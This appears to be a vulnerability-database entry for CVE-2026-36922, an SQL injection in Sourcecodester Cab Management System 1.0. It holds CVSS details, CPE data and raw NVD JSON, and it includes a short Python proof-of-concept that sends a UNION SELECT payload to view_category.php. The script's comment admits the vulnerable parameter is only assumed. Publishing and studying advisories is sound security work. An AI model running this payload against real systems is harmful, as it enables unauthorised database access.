Security Vulnerability Report
中文
CVE-2026-36922 CVSS 2.7 LOW

CVE-2026-36922

Published: 2026-04-13 13:16:42
Last Modified: 2026-04-14 17:43:16

Description

Sourcecodester Cab Management System v1.0 is vulnerable to SQL injection in the file /cms/admin/categories/view_category.php.

CVSS Details

CVSS Score
2.7
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:oretnom23:cab_management_system:1.0:*:*:*:*:*:*:* - VULNERABLE
Sourcecodester Cab Management System 1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC for CVE-2026-36922 # Target: /cms/admin/categories/view_category.php # Vulnerable parameter: id (assumed based on file context) import requests target_url = "http://target_ip/cms/admin/categories/view_category.php" cookies = { "PHPSESSID": "<admin_session_id>" # Requires High Privilege (Admin) } # Simple SQL Injection test payload payload = "1' UNION SELECT 1,2,3,4,5-- -" params = { "id": payload } response = requests.get(target_url, params=params, cookies=cookies) if response.status_code == 200: print("SQL Injection executed successfully.") print(response.text) else: print("Failed to execute request.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-36922", "sourceIdentifier": "[email protected]", "published": "2026-04-13T13:16:42.000", "lastModified": "2026-04-14T17:43:16.407", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Sourcecodester Cab Management System v1.0 is vulnerable to SQL injection in the file /cms/admin/categories/view_category.php."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N", "baseScore": 2.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oretnom23:cab_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "62692EFD-FCF7-4257-9FDD-81F20FAF20E7"}]}]}], "references": [{"url": "https://github.com/hubdk01/bug_report/blob/main/Sourcecodester/cab-management-system/SQL-1.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}